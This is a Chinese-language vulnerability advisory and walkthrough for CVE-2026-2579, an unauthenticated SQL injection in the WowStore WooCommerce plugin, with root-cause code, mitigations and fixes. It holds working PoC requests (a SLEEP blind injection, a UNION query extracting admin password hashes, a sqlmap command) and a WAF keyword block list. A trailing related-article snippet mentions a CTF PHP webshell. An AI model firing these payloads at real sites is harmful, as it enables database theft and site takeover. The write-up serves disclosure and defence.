当前位置: 首页 > article >正文

WowStore – Store Builder Product Blocks for WooCommerce WordPress 插件SQL注入[ CVE-2026-2579 ]

基本信息项目详情漏洞编号CVE-2026-2579插件名称WowStore – Store Builder Product Blocks for WooCommercefofawp-content/plugins/product-blocks受影响版本≤ 4.4.3补丁版本4.4.4CVSS 3.17.5高危漏洞类型SQL注入SQL Injection利用难度低无需认证危害等级高危安装量6000漏洞概述WowStore前身为 product-blocks是一款流行的 WordPress WooCommerce 商店构建器和产品块插件允许用户创建精美的电商页面。该插件在所有版本包括 4.4.3中存在未经认证的 SQL 注入漏洞攻击者可以通过构造恶意的 REST API 请求在无需登录的情况下执行任意 SQL 语句从而从数据库中提取敏感信息。漏洞成因根本原因分析该漏洞的根本原因在于插件开发者对用户输入的处理不当以及直接将用户输入拼接到 SQL 查询字符串中且REST API 端点未进行权限验证。1. 不安全的REST API端点权限设置在classes/REST_API.php文件中product-search端点的权限回调被设置为__return_true意味着**任何用户包括未登录用户**都可以访问该端点// classes/REST_API.php 第 117-124 行register_rest_route(wopb,product-search,array(methodsPOST,callbackarray($this,product_search),permission_callback__return_true,// 未经认证!));2. 不安全的SQL拼接方式在classes/Functions.php文件的custom_post_query()方法中filter_search_key参数直接拼接到 SQL 查询中没有使用$wpdb-prepare()进行预处理// classes/Functions.php 第 2582-2592 行publicfunctioncustom_post_query($where,$query){global$wpdb;if(!empty($query-get(filter_search_key))){$where. AND ({$wpdb-prefix}posts.post_title LIKE %{$query-get(filter_search_key)}% OR (post_meta.meta_key_sku AND post_meta.meta_value LIKE %{$query-get(filter_search_key)}%) );}return$where;}3. 用户输入直接传入SQL查询filter_search_key参数通过以下调用链从用户请求中获取/wp-json/wopb/product-search (REST API) ↓ 调用 product_search() 方法 (REST_API.php) ↓ 设置 $params[search] → filter_search_key ↓ 调用 search_block_param() 方法 (REST_API.php) ↓ 添加 add_filter(posts_where, custom_post_query) ↓ 触发 custom_post_query() 使用 $query-get(filter_search_key)4. 数据流分析用户发送 POST 请求到/wp-json/wopb/product-searchsearch参数通过sanitize_text_field()处理后赋值给filter_search_keycustom_post_query()钩子被添加 WordPress 查询中查询执行时filter_search_key被直接拼接到 WHERE 子句中攻击者可以注入任意 SQL 代码漏洞影响1. 数据泄露风险攻击者可以获取WordPress所有用户的用户名、密码哈希、邮箱地址读取数据库中的敏感配置信息如 WordPress 密钥、数据库凭据导出整个数据库内容包括产品信息、订单数据、客户信息2. 数据篡改风险攻击者可以修改管理员密码接管网站篡改产品价格和库存信息删除或损坏重要数据3. 服务器沦陷风险在特定条件下攻击者可以通过SQL注入获取服务器shell在服务器上执行任意命令完全控制目标服务器漏洞复现受影响端点端点方法认证要求/wp-json/wopb/product-searchPOST无需认证复现步骤验证漏洞存在时间盲注POST /wp-json/wopb/product-search HTTP/1.1 Host: 127.0.0.1 Content-Type: application/json { search: test AND (SELECT * FROM (SELECT(SLEEP(5)))a) AND 11, blockId: test, blockName: wopb_product_search, postId: 1 }UNION注入提取管理员凭据POST /wp-json/wopb/product-search HTTP/1.1 Host: 127.0.0.1 Content-Type: application/json { search: test UNION SELECT user_login, user_pass FROM wp_users WHERE ID1-- -, blockId: test, blockName: wopb_product_search, postId: 1 }使用sqlmap进行自动化测试python sqlmap.py-uhttp://127.0.0.1/wp-json/wopb/product-search--datasearchtestblockIdtestblockNamewopb_product_searchpostId1--batch--level5--risk3修复建议1. 立即升级强烈建议所有用户立即升级到 4.4.4 或更高版本官方已在该版本中修复了此漏洞。2. 临时缓解措施无法立即升级时如果暂时无法升级可以通过以下方式缓解风险方法1使用WAF规则拦截在Web应用防火墙WAF中添加规则拦截包含SQL关键字的请求- 监控路径/wp-json/wopb/product-search* - 拦截关键词UNION、SELECT、INSERT、UPDATE、DELETE、DROP、SLEEP、BENCHMARK - 拦截特殊字符单引号、分号、注释符(--、/*、*/)方法2限制REST API端点访问在主题的functions.php中添加以下代码add_action(rest_api_init,function(){register_rest_route(wopb,product-search,array(methodsPOST,callbackfunction(){if(!is_user_logged_in()){wp_die(Access Denied,Access Denied,[response403]);}},permission_callbackfunction(){returnis_user_logged_in();}));},99);方法3禁用相关REST API端点add_filter(rest_endpoints,function($endpoints){if(isset($endpoints[/wp-json/wopb/product-search])){unset($endpoints[/wp-json/wopb/product-search]);}return$endpoints;});3. 代码修复方案方案1添加权限验证推荐// classes/REST_API.php 第 117-124 行register_rest_route(wopb,product-search,array(methodsPOST,callbackarray($this,product_search),permission_callbackfunction(){returnis_user_logged_in();// 要求用户登录}));方案2使用预处理语句// classes/Functions.php 第 2582-2592 行publicfunctioncustom_post_query($where,$query){global$wpdb;if(!empty($query-get(filter_search_key))){$search_term$wpdb-esc_like($query-get(filter_search_key));$where.$wpdb-prepare( AND ({$wpdb-prefix}posts.post_title LIKE %s OR (post_meta.meta_key_sku AND post_meta.meta_value LIKE %s) ),%.$search_term.%,%.$search_term.%);}return$where;}方案3严格输入验证// 在 product_search 方法中添加$paramsarray(searchisset($data[search])?sanitize_text_field($data[search]):,);// 添加输入验证if(!empty($params[search])){// 只允许字母、数字、空格和常见搜索字符if(!preg_match(/^[a-zA-Z0-9\s\-_]$/,$params[search])){returnnewWP_Error(invalid_search,Invalid search parameter,array(status400));}}免责声明本报告仅供安全研究和授权测试使用。未经授权对他人系统进行安全测试属于违法行为请遵守相关法律法规。使用本报告中的信息所造成的任何后果与报告作者无关。

相关文章:

WowStore – Store Builder Product Blocks for WooCommerce WordPress 插件SQL注入[ CVE-2026-2579 ]

基本信息项目详情漏洞编号CVE-2026-2579插件名称WowStore – Store Builder & Product Blocks for WooCommercefofa"wp-content/plugins/product-blocks"受影响版本≤ 4.4.3补丁版本4.4.4CVSS 3.17.5(高危)漏洞类型SQL注入(SQL…...

AI时代前端突围指南

在AI浪潮席卷全球的背景下,前端开发者正站在一个机遇与挑战并存的历史节点。生存与发展的关键在于主动拥抱变化,将AI从潜在的“替代者”转变为强大的“赋能工具”,并以此为核心重构自身的技术栈与职业定位。 一、AI时代前端开发者的核心能力…...

CTFShow _Web应用安全与防护 第二章WP

1.一句话木马变形看到了php代码解释器,那么就可以输入一些php代码,看看是否有什么过滤,先输入一个 phpinfo();成功返回了php相关信息,那么可以尝试一些命令注入system(ls);成功返回了当前目录下的文件,看到了flag文件&…...

如何在ESP32上运行TinyML模型

在ESP32上运行TinyML模型,主要流程可以概括为“在电脑上训练模型 -> 转换为轻量格式 -> 部署到设备进行推理”。下面梳理出三种主流的可行方案,你可以根据自己的技术背景和项目需求进行选择。核心流程概览无论选择哪种方案,都遵循类似的…...

C++中的前置自增运算符与后置自增运算符

C中的前置自增运算符与后置自增运算符 语义上的区别 i, 后置自增, 先返回旧值, 再自增; i, 前置自增, 先自增, 再返回旧值; 程序测试#include <iostream>using namespace std;int main() {int a {1}, b {a}, c {a};cout << "a " << a << en…...

低成本边缘AI硬件开发实战:从芯片选型到量产部署

低成本边缘AI硬件开发实战&#xff1a;从芯片选型到量产部署 引言 边缘AI正快速渗透智能制造、智能安防、宠物科技等中小企业市场。然而&#xff0c;高昂的硬件成本、复杂的开发流程成为落地瓶颈。上海拓匡科技近期为多家中小企业完成边缘AI硬件全流程交付&#xff0c;本文分享…...

Web实现电脑画面预览鼠标远程操作

使用pyhon实现web预览电脑画面以及鼠标远程操作 1 界面效果 2 电脑端程序 tmp.py import asyncio import websockets import json import base64 import io import time from PIL import ImageGrab import pyautogui from PIL import Image...

Ubuntu 22.04下RTX 4090多卡训练Qwen-14B,NCCL通信报错怎么解?(实测有效)

Ubuntu 22.04下RTX 4090多卡训练Qwen-14B的NCCL通信问题解决方案 最近在Ubuntu 22.04系统上使用RTX 4090显卡进行Qwen-14B模型的多卡训练时&#xff0c;遇到了一个典型的NCCL通信报错问题。这个错误不仅影响了训练效率&#xff0c;还让不少开发者陷入了调试的困境。本文将深入分…...

2026商用免许可音乐全攻略:合法商用无压力的优质平台终极盘点

在短视频、品牌营销、商业播客内容井喷的2026年&#xff0c;商用音乐的版权合规与成本控制&#xff0c;已成为内容创作者、营销团队和企业绕不开的核心问题。传统音乐授权流程繁琐、持续支付版税成本高昂&#xff0c;而商用免许可音乐凭借一次性付费甚至零成本、授权清晰、合法…...

人工智能时代算力基建哪家强?

中国联通与中国电信&#xff1a;人工智能、云计算、无人驾驶与机器人通信的竞争优势分析 ——基于2025-2026年券商研报与行业动态的深度解读 摘要 在“十五五”规划开局之年&#xff08;2026年&#xff09;&#xff0c;中国通信行业正经历从“传统管道商”向“数字智能服务商”…...

健康有益健康监测座舱:以科技之力,定义出行健康新标杆

汽车产业新四化浪潮席卷而来&#xff0c;当汽车从代步工具升级为智能移动空间&#xff0c;驾乘者对健康出行的需求也迎来质的飞跃。如今&#xff0c;单纯的座舱舒适配置已无法满足用户期待&#xff0c;出行即健康守护成为新的消费痛点&#xff0c;也成为车企突破同质化竞争的核…...

gorm 中的Updates Update, Save,Create , UpdateColumn 区别与联系

在 GORM&#xff08;Go 的 ORM 库&#xff09;中Updates、Update、Save、Create、UpdateColumn 等方法都用于数据的写入或更新&#xff0c;但它们的行为、触发的钩子&#xff08;Hooks&#xff09;、性能、适用场景有显著区别。以下是详细对比与联系:一、核心方法对比表方法用途…...

错误弹窗记录

public partial class ErrorForm : Form{private static string error_str "系统错误";public ErrorForm(){InitializeComponent();pictureBox1.Image SystemIcons.Error.ToBitmap();pictureBox1.SizeMode PictureBoxSizeMode.StretchImage;label1.Text Error_st…...

从CUDA到MUSA(四):GPU架构揭秘——从Warp到Occupancy

引言&#xff1a;从代码到硬件的深层理解 在前三篇博客中&#xff0c;我们完成了GPU编程的"入门三部曲"&#xff1a;理解异构计算的设计哲学、编写第一个向量加法程序、掌握多维线程组织与数据映射。至此&#xff0c;你已经能够写出正确的GPU程序。 但正确只是起点。…...

2026 年四可改造最后期限!这些省份必须完成

摘要&#xff1a;2026 年是分布式光伏四可改造的关键年份&#xff0c;多个省份明确最后完成期限。本文汇总 45 省市四可改造政策时间要求&#xff0c;帮您快速了解所在地区截止时间、改造要求和未完成后果。建议收藏备用&#xff01;关键词&#xff1a;四可改造、2026 年、最后…...

计算机毕业设计springboot校园智能卡管理系统设计与实现 高校一卡通数字化管理平台的设计与实现 基于Spring Boot框架的校园智慧卡服务系统开发

计算机毕业设计springboot校园智能卡管理系统设计与实现8wbp89&#xff08;配套有源码 程序 mysql数据库 论文&#xff09; 本套源码可以在文本联xi,先看具体系统功能演示视频领取&#xff0c;可分享源码参考。随着高校信息化建设的深入推进&#xff0c;传统校园卡管理模式已难…...

Dify 模型供应商下载失败解决办法

问题现象&#xff1a; 部署或使用 Dify 时&#xff0c;模型供应商&#xff08;如 OpenAI、Anthropic 等&#xff09;的依赖包下载失败&#xff0c;提示网络连接超时或资源不可用。 原因定位&#xff1a; langgenius/dify: Production-ready platform for agentic workflow dev…...

音叉这玩意儿在光热振动里真是妙啊,特别是用COMSOL建模的时候,玩参数就像调电子琴的旋钮。先给你们看段核心参数设置代码

COMSOL仿真模型音叉光热致振动光源频率、光斑直径、光斑位置可调&#xff0c;特征频率振型model.param.set(f0, 32[Hz], 基准频率) model.param.set(d_spot, 20[um], 光斑直径) model.param.set(x_pos, 0.5*L_tine, 光斑横向位置) 这三个参数直接决定了音叉会不会"唱歌&qu…...

java基于微信小程序的物流仓储管理系统 可视化

目录系统架构设计核心功能模块划分技术实现路径性能优化策略测试验证方案部署运维建议项目技术支持可定制开发之功能创新亮点源码获取详细视频演示 &#xff1a;文章底部获取博主联系方式&#xff01;同行可合作系统架构设计 采用前后端分离架构&#xff0c;前端使用微信小程序…...

数据中台数据权限体系:基于RBAC的精细控制

数据中台数据权限体系:基于RBAC的精细控制 关键词:数据中台、数据权限、RBAC、访问控制、数据安全、权限管理、数据治理 摘要:本文深入探讨了数据中台环境下基于RBAC(基于角色的访问控制)的数据权限体系设计与实现。文章首先介绍了数据中台权限管理的核心挑战,然后详细解析…...

污水处理施耐德TM218 PLC程序开发与分享

污水处理施耐德TM218PLC程序&#xff0c;SoMachine V4.3软件设计&#xff0c;带软件下载链接&#xff0c;带io分配和注释最近做了一个污水处理相关的施耐德TM218 PLC项目&#xff0c;用SoMachine V4.3软件进行设计&#xff0c;在这里和大家分享一下整个过程&#xff0c;还会给出…...

9大主流CRM核心能力对比:从线索到报表的全流程专业解析

9大主流CRM核心能力横向对比&#xff1a;从线索到报表的全流程专业解析CRM&#xff08;客户关系管理&#xff09;的核心价值在于将“客户”从零散数据转化为可运营的资产&#xff0c;其能力边界覆盖“线索获取-客户运营-商机转化-订单交付-数据复盘”的全生命周期。本文基于线索…...

别让AI把你带沟里:调教这货帮你写代码的实战指南

现在这年头&#xff0c;写代码要是没个AI傍身&#xff0c;出门都不好意思跟人打招呼。GitHub Copilot、ChatGPT、Claude……这些名字一个个听着跟漫威英雄似的。很多哥们儿心想&#xff1a;“这下稳了&#xff0c;以后我只要动动嘴&#xff0c;代码让AI写&#xff0c;我负责躺平…...

ChurchCRM SQL注入漏洞(CNVD-2026-12565、CVE-2026-24854)

ChurchCRM 是一款开源的教堂客户关系管理系统&#xff0c;采用 PHP 开发&#xff0c;支持成员管理、贡献跟踪、事件安排及多语言沟通等功能。系统界面友好&#xff0c;操作简单&#xff0c;且提供详尽文档与活跃社区支持&#xff0c;助力教堂高效管理日常运营。 国家信息安全漏…...

Spring面试高频题:从基础到源码,通俗拆解+避坑指南

本文拒绝晦涩难懂的源码堆砌&#xff0c;用“通俗类比细节拆解面试真题”的方式&#xff0c;把Spring面试中最常考、最易踩坑的知识点讲透&#xff0c;不管是初级面试还是中级面试&#xff0c;都能直接套用&#xff0c;帮你轻松拿下Spring相关考题。一、Spring基础认知&#xf…...

使用yolov26实现目标检测

一、创建虚拟环境 打开anaconda&#xff0c;选择Anaconda Prompt。 创建一个新的python环境&#xff0c;这里以yolov26命名新建环境&#xff0c;python使用3.12。 conda create -n yolo26 python3.12 回车后出现新建环境提醒输入 y 继续&#xff0c;耐心等待全部下载完成后自…...

从入门到精通:Kafka核心原理与实战避坑指南

在分布式系统中&#xff0c;消息队列是实现高可用、高并发、解耦的核心组件&#xff0c;而Kafka作为当下最流行的分布式消息队列之一&#xff0c;凭借高吞吐量、高可靠性、可扩展性等优势&#xff0c;广泛应用于日志收集、消息分发、流处理等场景。无论是后端开发、大数据处理&…...

Unity网络基础UDP客户端

第一部分&#xff1a;核心概念预习在看代码之前&#xff0c;你需要明白这几个核心概念&#xff1a;UDP (User Datagram Protocol)&#xff1a;就像寄明信片。你只管把信发出去&#xff0c;不需要先跟对方建立连接&#xff0c;速度极快&#xff0c;但不保证对方一定能收到&#…...

feed二级缓存设计day05

背景&#xff1a;feed流&#xff1a;投喂流&#xff0c;主动把消息发给我们&#xff0c;类似于朋友圈别人的消息组成了我的主页feed流与内容详情是该社区访问最多的接口&#xff0c;面临着以下挑战&#xff1a;- **高并发读压力**&#xff1a;首页 Feed 与热门内容详情同一时刻…...

SpringBoot+Vue 办公信息系统管理平台源码免费分享【适合毕设/课设/学习】Java+Vue+MySQL

【源码在文章最后】 ## 项目概述 办公自动化系统&#xff08;Office Automatic System&#xff0c;简称OA&#xff09;是一个基于Spring Boot和Vue.js的企业级办公管理平台&#xff0c;旨在提高企业内部办公效率&#xff0c;实现办公流程的数字化和自动化。 ## 项目信息 - *…...